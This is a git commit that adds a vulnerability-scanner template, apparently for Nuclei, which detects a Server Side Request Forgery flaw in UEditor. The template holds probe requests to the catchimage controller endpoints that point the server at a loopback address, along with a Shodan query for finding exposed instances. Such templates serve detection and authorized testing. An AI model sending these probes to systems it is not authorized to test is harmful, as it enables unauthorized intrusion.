Merge pull request #6906 from pwnhxl/ueditorssrf

ueditor-ssrf
2023-03-17 16:27:16 +05:30 · 2023-03-17 16:27:16 +05:30 · c74b5c686c
parent 99b79f7bfb 74668faef1
commit c74b5c686c
1 changed files with 35 additions and 0 deletions
--- a/vulnerabilities/ueditor/ueditor-ssrf.yaml
+++ b/vulnerabilities/ueditor/ueditor-ssrf.yaml
@ -0,0 +1,35 @@
+id: ueditor-ssrf
+
+info:
+  name: UEditor - Server Side Request Forgery
+  author: pwnhxl
+  severity: medium
+  description: UEditor contains an Server Side Request Forgery vulnerability.
+  reference:
+    - https://xz.aliyun.com/t/4154
+    - https://www.seebug.org/vuldb/ssvid-97311
+  metadata:
+    verified: "true"
+    shodan-query: html:"UEditor"
+  tags: ueditor,ssrf
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/ueditor/php/controller.php?action=catchimage&source[]=http://127.0.0.1:{{rand_text_numeric(6)}}/?1.png"
+      - "{{BaseURL}}/ueditor/jsp/controller.jsp?action=catchimage&source[]=http://127.0.0.1:{{rand_text_numeric(6)}}/?1.png"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '\u94fe\u63a5\u4e0d\u53ef\u7528'
+          - '"original":'
+          - '"SUCCESS"'
+        condition: and
+
+      - type: status
+        status:
+          - 200